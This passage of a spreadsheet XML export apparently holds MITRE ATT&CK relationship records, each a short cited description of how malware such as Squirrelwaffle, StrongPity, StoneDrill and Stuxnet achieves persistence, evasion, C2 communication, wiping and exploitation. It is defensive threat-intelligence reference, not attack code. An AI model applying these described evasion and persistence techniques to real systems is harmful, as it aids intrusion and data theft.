    <t>[Squirrelwaffle](https://attack.mitre.org/software/S1030) has downloaded and executed additional encoded payloads.(Citation: ZScaler Squirrelwaffle Sep 2021)(Citation: Netskope Squirrelwaffle Oct 2021)</t>
  </si>
  <si>
    <t>relationship--66794b81-fc1e-4a28-9a52-7e67d64cbed6</t>
  </si>
  <si>
    <t>[Squirrelwaffle](https://attack.mitre.org/software/S1030) has relied on users enabling malicious macros within Microsoft Excel and Word attachments.(Citation: ZScaler Squirrelwaffle Sep 2021)(Citation: Netskope Squirrelwaffle Oct 2021)</t>
  </si>
  <si>
    <t>relationship--b0ee5fb3-ea57-4b00-8d3e-ff911db8f0e7</t>
  </si>
  <si>
    <t>[Squirrelwaffle](https://attack.mitre.org/software/S1030) has relied on victims to click on a malicious link send via phishing campaigns.(Citation: ZScaler Squirrelwaffle Sep 2021)</t>
  </si>
  <si>
    <t>relationship--3de1cc89-ee9a-4476-9d93-a034da6a90bf</t>
  </si>
  <si>
    <t>[Squirrelwaffle](https://attack.mitre.org/software/S1030) has been obfuscated with a XOR-based algorithm.(Citation: ZScaler Squirrelwaffle Sep 2021)(Citation: Netskope Squirrelwaffle Oct 2021)</t>
  </si>
  <si>
    <t>relationship--bda0ff4f-ed93-4d84-bfa4-dd39abe9fd62</t>
  </si>
  <si>
    <t>[Squirrelwaffle](https://attack.mitre.org/software/S1030) has used PowerShell to execute its payload.(Citation: ZScaler Squirrelwaffle Sep 2021)(Citation: Netskope Squirrelwaffle Oct 2021)</t>
  </si>
  <si>
    <t>relationship--e3831a8a-1713-49d3-a464-14437d213c3e</t>
  </si>
  <si>
    <t>[Squirrelwaffle](https://attack.mitre.org/software/S1030) has been executed using `regsvr32.exe`.(Citation: ZScaler Squirrelwaffle Sep 2021)</t>
  </si>
  <si>
    <t>relationship--3283d0a8-5cd2-4548-a3bd-657d51684cd9</t>
  </si>
  <si>
    <t>[Squirrelwaffle](https://attack.mitre.org/software/S1030) has been executed using `rundll32.exe`.(Citation: ZScaler Squirrelwaffle Sep 2021)(Citation: Netskope Squirrelwaffle Oct 2021)</t>
  </si>
  <si>
    <t>relationship--f176cbd3-81e9-4e7e-b5e2-d6a44c7bf789</t>
  </si>
  <si>
    <t>[Squirrelwaffle](https://attack.mitre.org/software/S1030) has been packed with a custom packer to hide payloads.(Citation: ZScaler Squirrelwaffle Sep 2021)(Citation: Netskope Squirrelwaffle Oct 2021)</t>
  </si>
  <si>
    <t>relationship--c2266528-a862-4fc0-bfa1-4fb1d48daa56</t>
  </si>
  <si>
    <t>[Squirrelwaffle](https://attack.mitre.org/software/S1030) has been distributed via malicious Microsoft Office documents within spam emails.(Citation: Netskope Squirrelwaffle Oct 2021)</t>
  </si>
  <si>
    <t>relationship--69684ccb-b9c0-4284-b2e5-09f15a691f80</t>
  </si>
  <si>
    <t>[Squirrelwaffle](https://attack.mitre.org/software/S1030) has been distributed through phishing emails containing a malicious URL.(Citation: ZScaler Squirrelwaffle Sep 2021)</t>
  </si>
  <si>
    <t>relationship--2c5ff227-9d4b-4af0-b534-83b55733f5b5</t>
  </si>
  <si>
    <t>[Squirrelwaffle](https://attack.mitre.org/software/S1030) has encoded its communications to C2 servers using Base64.(Citation: ZScaler Squirrelwaffle Sep 2021)</t>
  </si>
  <si>
    <t>relationship--791b12bb-cb49-4fc6-a4a5-ea7773fce408</t>
  </si>
  <si>
    <t>[Squirrelwaffle](https://attack.mitre.org/software/S1030) has gathered victim computer information and configurations.(Citation: ZScaler Squirrelwaffle Sep 2021)</t>
  </si>
  <si>
    <t>relationship--0f688474-53c2-4ad5-8998-bd8c39a79f04</t>
  </si>
  <si>
    <t>[Squirrelwaffle](https://attack.mitre.org/software/S1030) has collected the victim’s external IP address.(Citation: ZScaler Squirrelwaffle Sep 2021)</t>
  </si>
  <si>
    <t>relationship--fe83c4f7-7a52-4a4f-8d17-a28e0ca162ed</t>
  </si>
  <si>
    <t>[Squirrelwaffle](https://attack.mitre.org/software/S1030) can collect the user name from a compromised host.(Citation: ZScaler Squirrelwaffle Sep 2021)</t>
  </si>
  <si>
    <t>relationship--044576aa-2ec0-4f88-9cb9-ec6817dda514</t>
  </si>
  <si>
    <t>[Squirrelwaffle](https://attack.mitre.org/software/S1030) has contained a hardcoded list of IP addresses to block that belong to sandboxes and analysis platforms.(Citation: ZScaler Squirrelwaffle Sep 2021)(Citation: Netskope Squirrelwaffle Oct 2021)</t>
  </si>
  <si>
    <t>relationship--e9be6f26-bcc8-49b2-b1aa-e8ce664a1fcb</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</si>
  <si>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</si>
  <si>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relationship--0862c2ff-157e-4ccd-973a-2b74cb6c79f1</t>
  </si>
  <si>
    <t>[Squirrelwaffle](https://attack.mitre.org/software/S1030) has used HTTP POST requests for C2 communications.(Citation: ZScaler Squirrelwaffle Sep 2021)</t>
  </si>
  <si>
    <t>relationship--796f38d7-b756-43e5-bb81-86169c533ec1</t>
  </si>
  <si>
    <t>[Squirrelwaffle](https://attack.mitre.org/software/S1030) has used `cmd.exe` for execution.(Citation: Netskope Squirrelwaffle Oct 2021)</t>
  </si>
  <si>
    <t>relationship--e3f48900-e929-4040-8e7b-13d06933ce1d</t>
  </si>
  <si>
    <t>[SslMM](https://attack.mitre.org/software/S0058) contains a feature to manipulate process privileges and tokens.(Citation: Baumgartner Naikon 2015)</t>
  </si>
  <si>
    <t>relationship--93d83b03-8367-4655-84a5-9abaee885700</t>
  </si>
  <si>
    <t>[SslMM](https://attack.mitre.org/software/S0058) identifies and kills anti-malware processes.(Citation: Baumgartner Naikon 2015)</t>
  </si>
  <si>
    <t>relationship--babaa2be-7c41-490a-bd0b-2cf140858244</t>
  </si>
  <si>
    <t>[SslMM](https://attack.mitre.org/software/S0058) has a hard-coded primary and backup C2 string.(Citation: Baumgartner Naikon 2015)</t>
  </si>
  <si>
    <t>relationship--329678a6-eb6b-499b-90a8-059d1cf1a35f</t>
  </si>
  <si>
    <t>[SslMM](https://attack.mitre.org/software/S0058) creates a new thread implementing a keylogging facility using Windows Keyboard Accelerators.(Citation: Baumgartner Naikon 2015)</t>
  </si>
  <si>
    <t>relationship--8d4effdd-6d91-473d-aa81-d121f1c77881</t>
  </si>
  <si>
    <t>To establish persistence, [SslMM](https://attack.mitre.org/software/S0058) identifies the Start Menu Startup directory and drops a link to its own executable disguised as an “Office Start,” “Yahoo Talk,” “MSN Gaming Z0ne,” or “MSN Talk” shortcut.(Citation: Baumgartner Naikon 2015)</t>
  </si>
  <si>
    <t>relationship--c5cf4822-a0bf-442a-9943-1937ac45520b</t>
  </si>
  <si>
    <t>relationship--8904bd95-4844-4fe4-b6b6-47e4a4f8d85d</t>
  </si>
  <si>
    <t>relationship--79ecf1f6-a17d-4374-a84c-811669e39261</t>
  </si>
  <si>
    <t>[SslMM](https://attack.mitre.org/software/S0058) sends information to its hard-coded C2, including OS version, service pack information, processor speed, system name, and OS install date.(Citation: Baumgartner Naikon 2015)</t>
  </si>
  <si>
    <t>relationship--fbfc610a-5355-40fc-b5a1-059e89a1eb8d</t>
  </si>
  <si>
    <t>[SslMM](https://attack.mitre.org/software/S0058) sends the logged-on username to its hard-coded C2.(Citation: Baumgartner Naikon 2015)</t>
  </si>
  <si>
    <t>relationship--0df8e968-716a-4de9-9669-862af62d6eb6</t>
  </si>
  <si>
    <t>[Starloader](https://attack.mitre.org/software/S0188) decrypts and executes shellcode from a file called Stars.jps.(Citation: Symantec Sowbug Nov 2017)</t>
  </si>
  <si>
    <t>relationship--283bdd5f-f356-43a2-864c-6f8211073d45</t>
  </si>
  <si>
    <t>[Starloader](https://attack.mitre.org/software/S0188) has masqueraded as legitimate software update packages such as Adobe Acrobat Reader and Intel.(Citation: Symantec Sowbug Nov 2017)</t>
  </si>
  <si>
    <t>relationship--90e64a7a-42e6-4b95-ae85-5ac324d7f6e2</t>
  </si>
  <si>
    <t>[StoneDrill](https://attack.mitre.org/software/S0380) has a disk wiper module that targets files other than those in the Windows directory.(Citation: Kaspersky StoneDrill 2017)</t>
  </si>
  <si>
    <t>relationship--fe2aa2b2-6508-40e1-b0cf-13c66ae43064</t>
  </si>
  <si>
    <t xml:space="preserve">[StoneDrill](https://attack.mitre.org/software/S0380) can wipe the accessible physical or logical drives of the infected machine.(Citation: Symantec Elfin Mar 2019)	</t>
  </si>
  <si>
    <t>relationship--d2041a67-d846-4a1b-b704-4e437baa731a</t>
  </si>
  <si>
    <t>[StoneDrill](https://attack.mitre.org/software/S0380) can wipe the master boot record of an infected computer.(Citation: Symantec Elfin Mar 2019)</t>
  </si>
  <si>
    <t>relationship--b32b4e03-1469-4a70-8d0b-cd3344e92b3f</t>
  </si>
  <si>
    <t xml:space="preserve">[StoneDrill](https://attack.mitre.org/software/S0380) has been observed deleting the temporary files once they fulfill their task.(Citation: Kaspersky StoneDrill 2017)	</t>
  </si>
  <si>
    <t>relationship--1b384505-b69a-4c0b-95f1-02384214abae</t>
  </si>
  <si>
    <t xml:space="preserve">[StoneDrill](https://attack.mitre.org/software/S0380) has downloaded and dropped temporary files containing scripts; it additionally has a function to upload files from the victims machine.(Citation: Kaspersky StoneDrill 2017)	</t>
  </si>
  <si>
    <t>relationship--10974f3d-30fc-4ab6-b691-21acff792a05</t>
  </si>
  <si>
    <t>[StoneDrill](https://attack.mitre.org/software/S0380) has obfuscated its module with an alphabet-based table or XOR encryption.(Citation: Kaspersky StoneDrill 2017)</t>
  </si>
  <si>
    <t>relationship--839ce1cc-c749-4a29-8aed-3c44e93c5db4</t>
  </si>
  <si>
    <t>[StoneDrill](https://attack.mitre.org/software/S0380) has relied on injecting its payload directly into the process memory of the victim's preferred browser.(Citation: Kaspersky StoneDrill 2017)</t>
  </si>
  <si>
    <t>relationship--7d7adc46-deab-4b32-9902-ac1beb0e95fa</t>
  </si>
  <si>
    <t>[StoneDrill](https://attack.mitre.org/software/S0380) has looked in the registry to find the default browser path.(Citation: Kaspersky StoneDrill 2017)</t>
  </si>
  <si>
    <t>relationship--b7316e86-545b-4397-9b1f-d05a8ea64f4f</t>
  </si>
  <si>
    <t xml:space="preserve">[StoneDrill](https://attack.mitre.org/software/S0380) can take screenshots.(Citation: Kaspersky StoneDrill 2017)	</t>
  </si>
  <si>
    <t>relationship--f097324d-6665-4d2d-8d84-eb05bada0dd3</t>
  </si>
  <si>
    <t xml:space="preserve">[StoneDrill](https://attack.mitre.org/software/S0380) can check for antivirus and antimalware programs.(Citation: Kaspersky StoneDrill 2017)	</t>
  </si>
  <si>
    <t>relationship--7e90117e-0a1b-4320-9b37-54e070c3dc49</t>
  </si>
  <si>
    <t xml:space="preserve">[StoneDrill](https://attack.mitre.org/software/S0380) has the capability to discover the system OS, Windows version, architecture and environment.(Citation: Kaspersky StoneDrill 2017)	</t>
  </si>
  <si>
    <t>relationship--9497e927-67da-4845-b7a9-fe7d13524110</t>
  </si>
  <si>
    <t xml:space="preserve">[StoneDrill](https://attack.mitre.org/software/S0380) can obtain the current date and time of the victim machine.(Citation: Kaspersky StoneDrill 2017)	</t>
  </si>
  <si>
    <t>relationship--54399f5a-a8ee-4f77-a363-23dd0033af12</t>
  </si>
  <si>
    <t xml:space="preserve">[StoneDrill](https://attack.mitre.org/software/S0380) has used several anti-emulation techniques to prevent automated analysis by emulators or sandboxes.(Citation: Kaspersky StoneDrill 2017)	</t>
  </si>
  <si>
    <t>relationship--02a35538-7a82-4b30-94ac-e943c19acfe4</t>
  </si>
  <si>
    <t xml:space="preserve">[StoneDrill](https://attack.mitre.org/software/S0380) has several VBS scripts used throughout the malware's lifecycle.(Citation: Kaspersky StoneDrill 2017)	</t>
  </si>
  <si>
    <t>relationship--efcdbec4-20e3-42e2-a0c4-1695083cd37e</t>
  </si>
  <si>
    <t>[StoneDrill](https://attack.mitre.org/software/S0380) has used the WMI command-line (WMIC) utility to run tasks.(Citation: Kaspersky StoneDrill 2017)</t>
  </si>
  <si>
    <t>relationship--80c90e89-2519-40cb-8757-06471e47d0fb</t>
  </si>
  <si>
    <t>[StreamEx](https://attack.mitre.org/software/S0142) has the ability to enumerate drive types.(Citation: Cylance Shell Crew Feb 2017)</t>
  </si>
  <si>
    <t>relationship--c8b0afbb-12eb-4b45-a1e1-b11755de2976</t>
  </si>
  <si>
    <t>[StreamEx](https://attack.mitre.org/software/S0142) has the ability to modify the Registry.(Citation: Cylance Shell Crew Feb 2017)</t>
  </si>
  <si>
    <t>relationship--69bff194-c90e-4e30-a369-57da4cff014d</t>
  </si>
  <si>
    <t>[StreamEx](https://attack.mitre.org/software/S0142) obfuscates some commands by using statically programmed fragments of strings when starting a DLL. It also uses a one-byte xor against 0x91 to encode configuration data.(Citation: Cylance Shell Crew Feb 2017)</t>
  </si>
  <si>
    <t>relationship--ee51d531-5cc4-4836-a55c-6062bde1a4d4</t>
  </si>
  <si>
    <t>[StreamEx](https://attack.mitre.org/software/S0142) has the ability to enumerate processes.(Citation: Cylance Shell Crew Feb 2017)</t>
  </si>
  <si>
    <t>relationship--0cbc1f3f-7a32-4056-bfa6-25186ac5e6a4</t>
  </si>
  <si>
    <t>[StreamEx](https://attack.mitre.org/software/S0142) uses rundll32 to call an exported function.(Citation: Cylance Shell Crew Feb 2017)</t>
  </si>
  <si>
    <t>relationship--1b4ee147-dc39-43d2-b468-fcd308e6cbae</t>
  </si>
  <si>
    <t>[StreamEx](https://attack.mitre.org/software/S0142) has the ability to scan for security tools such as firewalls and antivirus tools.(Citation: Cylance Shell Crew Feb 2017)</t>
  </si>
  <si>
    <t>relationship--df7fb8f2-e7a6-4342-8d67-09655ceefead</t>
  </si>
  <si>
    <t>[StreamEx](https://attack.mitre.org/software/S0142) has the ability to enumerate system information.(Citation: Cylance Shell Crew Feb 2017)</t>
  </si>
  <si>
    <t>relationship--788ca56e-1194-4c5f-a12b-72678390f1ef</t>
  </si>
  <si>
    <t>[StreamEx](https://attack.mitre.org/software/S0142) has the ability to remotely execute commands.(Citation: Cylance Shell Crew Feb 2017)</t>
  </si>
  <si>
    <t>relationship--fa04b7b3-e9ea-4c35-a2a5-8d0c73f5698b</t>
  </si>
  <si>
    <t>[StreamEx](https://attack.mitre.org/software/S0142) establishes persistence by installing a new service pointing to its DLL and setting the service to auto-start.(Citation: Cylance Shell Crew Feb 2017)</t>
  </si>
  <si>
    <t>relationship--5576c38e-6b03-4ea9-8936-60eeddb749a7</t>
  </si>
  <si>
    <t>[StrifeWater](https://attack.mitre.org/software/S1034) can collect data from a compromised host.(Citation: Cybereason StrifeWater Feb 2022)</t>
  </si>
  <si>
    <t>relationship--ef7d26b5-7d5f-463d-8279-82b45b6d01a4</t>
  </si>
  <si>
    <t>[StrifeWater](https://attack.mitre.org/software/S1034) can send data and files from a compromised host to its C2 server.(Citation: Cybereason StrifeWater Feb 2022)</t>
  </si>
  <si>
    <t>relationship--8b953ac7-23b8-4ddc-90a3-7c9d17fc4f54</t>
  </si>
  <si>
    <t>[StrifeWater](https://attack.mitre.org/software/S1034) can self delete to cover its tracks.(Citation: Cybereason StrifeWater Feb 2022)</t>
  </si>
  <si>
    <t>relationship--f3ea1137-f71c-40af-befa-6141e61f0161</t>
  </si>
  <si>
    <t>[StrifeWater](https://attack.mitre.org/software/S1034) can enumerate files on a compromised host.(Citation: Cybereason StrifeWater Feb 2022)</t>
  </si>
  <si>
    <t>relationship--bae19e73-3612-42a3-be35-5f5b2adfc5b7</t>
  </si>
  <si>
    <t>[StrifeWater](https://attack.mitre.org/software/S1034) can download updates and auxiliary modules.(Citation: Cybereason StrifeWater Feb 2022)</t>
  </si>
  <si>
    <t>relationship--f12643cb-1ff8-49b9-a57e-38246a46c428</t>
  </si>
  <si>
    <t>[StrifeWater](https://attack.mitre.org/software/S1034) has been named `calc.exe` to appear as a legitimate calculator program.(Citation: Cybereason StrifeWater Feb 2022)</t>
  </si>
  <si>
    <t>relationship--81ab128a-9c3f-4237-b6b1-7f2b681a8719</t>
  </si>
  <si>
    <t>[StrifeWater](https://attack.mitre.org/software/S1034) can use a variety of APIs for execution.(Citation: Cybereason StrifeWater Feb 2022)</t>
  </si>
  <si>
    <t>relationship--222fdbe3-5833-4be9-aa45-b85087606dc1</t>
  </si>
  <si>
    <t>[StrifeWater](https://attack.mitre.org/software/S1034) has create a scheduled task named `Mozilla\Firefox Default Browser Agent 409046Z0FF4A39CB` for persistence.(Citation: Cybereason StrifeWater Feb 2022)</t>
  </si>
  <si>
    <t>relationship--15d6e435-c5ba-47cd-8923-dc877092c79f</t>
  </si>
  <si>
    <t>[StrifeWater](https://attack.mitre.org/software/S1034) has the ability to take screen captures.(Citation: Cybereason StrifeWater Feb 2022)</t>
  </si>
  <si>
    <t>relationship--7e1ace47-17af-4291-b5f1-6b3c64c8ea6d</t>
  </si>
  <si>
    <t>[StrifeWater](https://attack.mitre.org/software/S1034) can encrypt C2 traffic using XOR with a hard coded key.(Citation: Cybereason StrifeWater Feb 2022)</t>
  </si>
  <si>
    <t>relationship--2315fa7f-2161-45c1-9f23-d47a96488465</t>
  </si>
  <si>
    <t>[StrifeWater](https://attack.mitre.org/software/S1034) can collect the OS version, architecture, and machine name to create a unique token for the infected host.(Citation: Cybereason StrifeWater Feb 2022)</t>
  </si>
  <si>
    <t>relationship--9ba5068b-4e9e-445f-831b-c3d8ca444e2a</t>
  </si>
  <si>
    <t>[StrifeWater](https://attack.mitre.org/software/S1034) can collect the user name from the victim's machine.(Citation: Cybereason StrifeWater Feb 2022)</t>
  </si>
  <si>
    <t>relationship--1218d239-d7ee-44ba-a88d-6b76cb16324e</t>
  </si>
  <si>
    <t>[StrifeWater](https://attack.mitre.org/software/S1034) can collect the time zone from the victim's machine.(Citation: Cybereason StrifeWater Feb 2022)</t>
  </si>
  <si>
    <t>relationship--8dc0845d-c807-4e30-ac26-086f086b248f</t>
  </si>
  <si>
    <t>[StrifeWater](https://attack.mitre.org/software/S1034) can modify its sleep time responses from the default of 20-22 seconds.(Citation: Cybereason StrifeWater Feb 2022)</t>
  </si>
  <si>
    <t>relationship--8aeea825-de75-404b-bde3-806ba749f416</t>
  </si>
  <si>
    <t>[StrifeWater](https://attack.mitre.org/software/S1034) can execute shell commands using `cmd.exe`.(Citation: Cybereason StrifeWater Feb 2022)</t>
  </si>
  <si>
    <t>relationship--1c13ff97-1581-4283-b9ec-f378f97f3440</t>
  </si>
  <si>
    <t>[StrongPity](https://attack.mitre.org/software/S0491) can compress and encrypt archived files into multiple .sft files with a repeated xor encryption scheme.(Citation: Talos Promethium June 2020)(Citation: Bitdefender StrongPity June 2020)</t>
  </si>
  <si>
    <t>relationship--3ad041f8-30ca-44bb-bad5-2e5b3e5d6242</t>
  </si>
  <si>
    <t>[StrongPity](https://attack.mitre.org/software/S0491) has encrypted C2 traffic using SSL/TLS.(Citation: Talos Promethium June 2020)</t>
  </si>
  <si>
    <t>relationship--a624f944-5f3e-4713-9e89-9964ae82c677</t>
  </si>
  <si>
    <t>[StrongPity](https://attack.mitre.org/software/S0491) has a file searcher component that can automatically collect and archive files based on a predefined list of file extensions.(Citation: Bitdefender StrongPity June 2020)</t>
  </si>
  <si>
    <t>relationship--8ec92ea1-6021-4e0f-9737-826e9f243830</t>
  </si>
  <si>
    <t>[StrongPity](https://attack.mitre.org/software/S0491) can automatically exfiltrate collected documents to the C2 server.(Citation: Talos Promethium June 2020)(Citation: Bitdefender StrongPity June 2020)</t>
  </si>
  <si>
    <t>relationship--0e3ea008-1a5e-4f58-aaa9-4da690539908</t>
  </si>
  <si>
    <t>[StrongPity](https://attack.mitre.org/software/S0491) has been signed with self-signed certificates.(Citation: Bitdefender StrongPity June 2020)</t>
  </si>
  <si>
    <t>relationship--e9a0006e-1667-4407-a451-47a4409b90f3</t>
  </si>
  <si>
    <t>[StrongPity](https://attack.mitre.org/software/S0491) can add directories used by the malware to the Windows Defender exclusions list to prevent detection.(Citation: Talos Promethium June 2020)</t>
  </si>
  <si>
    <t>relationship--5ca05cbf-6a28-4a6a-9d6c-e2b8331b2965</t>
  </si>
  <si>
    <t>[StrongPity](https://attack.mitre.org/software/S0491) can exfiltrate collected documents through C2 channels.(Citation: Talos Promethium June 2020)(Citation: Bitdefender StrongPity June 2020)</t>
  </si>
  <si>
    <t>relationship--354fe9c0-2b9b-43f9-98a0-ae0ee1515d4d</t>
  </si>
  <si>
    <t>[StrongPity](https://attack.mitre.org/software/S0491) can delete previously exfiltrated files from the compromised host.(Citation: Talos Promethium June 2020)(Citation: Bitdefender StrongPity June 2020)</t>
  </si>
  <si>
    <t>relationship--7dd11b5f-2f54-43a5-a2e1-9d33e24d89a0</t>
  </si>
  <si>
    <t>[StrongPity](https://attack.mitre.org/software/S0491) can parse the hard drive on a compromised host to identify specific file extensions.(Citation: Talos Promethium June 2020)</t>
  </si>
  <si>
    <t>relationship--8e08658c-78f5-4bd5-a6e8-d74200ed776c</t>
  </si>
  <si>
    <t>[StrongPity](https://attack.mitre.org/software/S0491) has the ability to hide the console window for its document search module from the user.(Citation: Talos Promethium June 2020)</t>
  </si>
  <si>
    <t>relationship--1248ffe0-ad3b-43a6-a358-763d8eab7fba</t>
  </si>
  <si>
    <t>[StrongPity](https://attack.mitre.org/software/S0491) can download files to specified targets.(Citation: Bitdefender StrongPity June 2020)</t>
  </si>
  <si>
    <t>relationship--c7cf767a-fa78-4ca7-9bd1-612d51d0c098</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</si>
  <si>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</si>
  <si>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relationship--6a552e69-29f1-4acc-8bd2-1f32d7550443</t>
  </si>
  <si>
    <t>[StrongPity](https://attack.mitre.org/software/S0491) has named services to appear legitimate.(Citation: Talos Promethium June 2020)(Citation: Bitdefender StrongPity June 2020)</t>
  </si>
  <si>
    <t>relationship--580254b6-1227-4c7d-a7b5-c4e7908e0acb</t>
  </si>
  <si>
    <t>31 July 2020</t>
  </si>
  <si>
    <t>[StrongPity](https://attack.mitre.org/software/S0491) has been bundled with legitimate software installation files for disguise.(Citation: Talos Promethium June 2020)</t>
  </si>
  <si>
    <t>relationship--f2502637-0d4a-4b94-928d-1f140f2d0ba1</t>
  </si>
  <si>
    <t>[StrongPity](https://attack.mitre.org/software/S0491) can use multiple layers of proxy servers to hide terminal nodes in its infrastructure.(Citation: Bitdefender StrongPity June 2020)</t>
  </si>
  <si>
    <t>relationship--c1d36d2e-a8ab-4132-8690-e97628a07a0f</t>
  </si>
  <si>
    <t xml:space="preserve">
[StrongPity](https://attack.mitre.org/software/S0491) has used HTTPS over port 1402 in C2 communication.(Citation: Bitdefender StrongPity June 2020)</t>
  </si>
  <si>
    <t>relationship--18714758-e6ea-4f61-87c9-6340c0001b9c</t>
  </si>
  <si>
    <t>[StrongPity](https://attack.mitre.org/software/S0491) has used encrypted strings in its dropper component.(Citation: Talos Promethium June 2020)(Citation: Bitdefender StrongPity June 2020)</t>
  </si>
  <si>
    <t>relationship--5bddc9b3-eaa0-487b-9d62-25a2a5fbb11a</t>
  </si>
  <si>
    <t>[StrongPity](https://attack.mitre.org/software/S0491) can use PowerShell to add files to the Windows Defender exclusions list.(Citation: Talos Promethium June 2020)</t>
  </si>
  <si>
    <t>relationship--93c02dec-e63e-4437-809c-dc99e82d177d</t>
  </si>
  <si>
    <t>[StrongPity](https://attack.mitre.org/software/S0491) can determine if a user is logged in by checking to see if explorer.exe is running.(Citation: Talos Promethium June 2020)</t>
  </si>
  <si>
    <t>relationship--de0ee6e1-6b97-40be-b036-5339db13e6e4</t>
  </si>
  <si>
    <t>[StrongPity](https://attack.mitre.org/software/S0491) can use the &lt;code&gt;HKCU\Software\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt; Registry key for persistence.(Citation: Talos Promethium June 2020)</t>
  </si>
  <si>
    <t>relationship--d5e9478c-439e-4ec5-8317-6d769dedc68a</t>
  </si>
  <si>
    <t>[StrongPity](https://attack.mitre.org/software/S0491) can identify if ESET or BitDefender antivirus are installed before dropping its payload.(Citation: Talos Promethium June 2020)</t>
  </si>
  <si>
    <t>relationship--7e32a557-f724-433f-84e0-756e14db7074</t>
  </si>
  <si>
    <t>[StrongPity](https://attack.mitre.org/software/S0491) can install a service to execute itself as a service.(Citation: Talos Promethium June 2020)(Citation: Bitdefender StrongPity June 2020)</t>
  </si>
  <si>
    <t>relationship--e7b10c00-0860-4592-a72c-e14e993e972b</t>
  </si>
  <si>
    <t>[StrongPity](https://attack.mitre.org/software/S0491) can identify the hard disk volume serial number on a compromised host.(Citation: Talos Promethium June 2020)</t>
  </si>
  <si>
    <t>relationship--a6b41bba-0b47-400d-9aa4-134b4f47994f</t>
  </si>
  <si>
    <t>[StrongPity](https://attack.mitre.org/software/S0491) can identify the IP address of a compromised host.(Citation: Talos Promethium June 2020)</t>
  </si>
  <si>
    <t>relationship--35178b99-6830-4150-a094-691888655525</t>
  </si>
  <si>
    <t>[StrongPity](https://attack.mitre.org/software/S0491) can use HTTP and HTTPS in C2 communications.(Citation: Talos Promethium June 2020)(Citation: Bitdefender StrongPity June 2020)</t>
  </si>
  <si>
    <t>relationship--6e06ca98-ec9a-4175-a154-4d4f1394774b</t>
  </si>
  <si>
    <t>[StrongPity](https://attack.mitre.org/software/S0491) has created new services and modified existing services for persistence.(Citation: Talos Promethium June 2020)</t>
  </si>
  <si>
    <t>relationship--9f751d66-0604-4d30-a820-022a8c90e870</t>
  </si>
  <si>
    <t>S0603</t>
  </si>
  <si>
    <t>Stuxnet</t>
  </si>
  <si>
    <t>malware--088f1d6e-0783-47c6-9923-9c79b2af43d4</t>
  </si>
  <si>
    <t>[Stuxnet](https://attack.mitre.org/software/S0603) encrypts exfiltrated data via C2 with static 31-byte long XOR keys.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)</t>
  </si>
  <si>
    <t>relationship--160d9be2-967e-4116-9c75-44b5b0a8927b</t>
  </si>
  <si>
    <t>[Stuxnet](https://attack.mitre.org/software/S0603) used a digitally signed driver with a compromised Realtek certificate.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)</t>
  </si>
  <si>
    <t>relationship--d0644c51-e386-4dd9-99c1-e9f601fc398b</t>
  </si>
  <si>
    <t>[Stuxnet](https://attack.mitre.org/software/S0603) infected WinCC machines via a hardcoded database server password.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)</t>
  </si>
  <si>
    <t>relationship--9c8be5c7-5f72-4c60-aaf7-f1f62eaf91f2</t>
  </si>
  <si>
    <t>[Stuxnet](https://attack.mitre.org/software/S0603) decrypts resources that are loaded into memory and executed.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)</t>
  </si>
  <si>
    <t>relationship--3921c748-c29e-4c2f-b5cb-bcc7c0237219</t>
  </si>
  <si>
    <t>[Stuxnet](https://attack.mitre.org/software/S0603) enumerates user accounts of the domain.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)</t>
  </si>
  <si>
    <t>relationship--8baa00da-64da-4acb-831e-2c001399394a</t>
  </si>
  <si>
    <t>[Stuxnet](https://attack.mitre.org/software/S0603) attempts to access network resources with a domain account’s credentials.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)</t>
  </si>
  <si>
    <t>relationship--d45ff9eb-aca1-4bda-b5a8-fd4034ac8f1e</t>
  </si>
  <si>
    <t>[Stuxnet](https://attack.mitre.org/software/S0603) injects an entire DLL into an existing, newly created, or preselected trusted process.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)</t>
  </si>
  <si>
    <t>relationship--7307a870-2d74-4e46-9ba0-8fb83d598cfb</t>
  </si>
  <si>
    <t>[Stuxnet](https://attack.mitre.org/software/S0603) checks for specific operating systems on 32-bit machines, Registry keys, and dates for vulnerabilities, and will exit execution if the values are not met.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)</t>
  </si>
  <si>
    <t>relationship--6a92b1de-a2f2-4e68-aabc-a5568614f18c</t>
  </si>
  <si>
    <t>[Stuxnet](https://attack.mitre.org/software/S0603) sends compromised victim information via HTTP.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)</t>
  </si>
  <si>
    <t>relationship--6f950d42-13f2-48e0-9ecf-3c48d7562460</t>
  </si>
  <si>
    <t>[Stuxnet](https://attack.mitre.org/software/S0603) used MS10-073 and an undisclosed Task Scheduler vulnerability to escalate privileges on local Windows machines.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)</t>
  </si>
  <si>
    <t>relationship--9b7b3fc7-0151-4848-9b66-774eaf72561f</t>
  </si>
  <si>
    <t>[Stuxnet](https://attack.mitre.org/software/S0603) propagates using the MS10-061 Print Spooler and MS08-067 Windows Server Service vulnerabilities.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)</t>
  </si>
  <si>
    <t>relationship--4f2bd19b-f0f4-4946-a7a5-4947be3346b1</t>
  </si>
  <si>
    <t>[Stuxnet](https://attack.mitre.org/software/S0603) has the ability to generate new C2 domains.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)</t>
  </si>
  <si>
    <t>relationship--85b5e45d-247e-4c8b-a991-95700e4d81d9</t>
  </si>
  <si>
    <t>[Stuxnet](https://attack.mitre.org/software/S0603) uses an RPC server that contains a routine for file deletion and also removes itself from the system through a DLL export by deleting specific files.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)</t>
  </si>
  <si>
    <t>relationship--3e153f3f-26aa-4ff6-8192-095b30e94bae</t>
  </si>
  <si>
    <t>[Stuxnet](https://attack.mitre.org/software/S0603) uses a driver to scan for specific filesystem driver objects.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)</t>
  </si>
  <si>
    <t>relationship--8363c29c-b5f4-4b0b-8396-52628c773430</t>
  </si>
  <si>
